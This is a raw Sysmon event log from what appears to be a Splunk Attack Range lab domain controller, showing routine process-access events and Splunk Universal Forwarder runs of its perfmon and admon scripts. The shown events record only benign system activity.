13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-DB00-00000000A301}2912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.937{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-DB00-00000000A301}2912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.939{59A5CD1D-8EE7-6005-DB00-00000000A301}2912C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-DA00-00000000A301}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-DA00-00000000A301}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-DA00-00000000A301}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.829{59A5CD1D-8EE7-6005-DA00-00000000A301}5044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D900-00000000A301}4956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 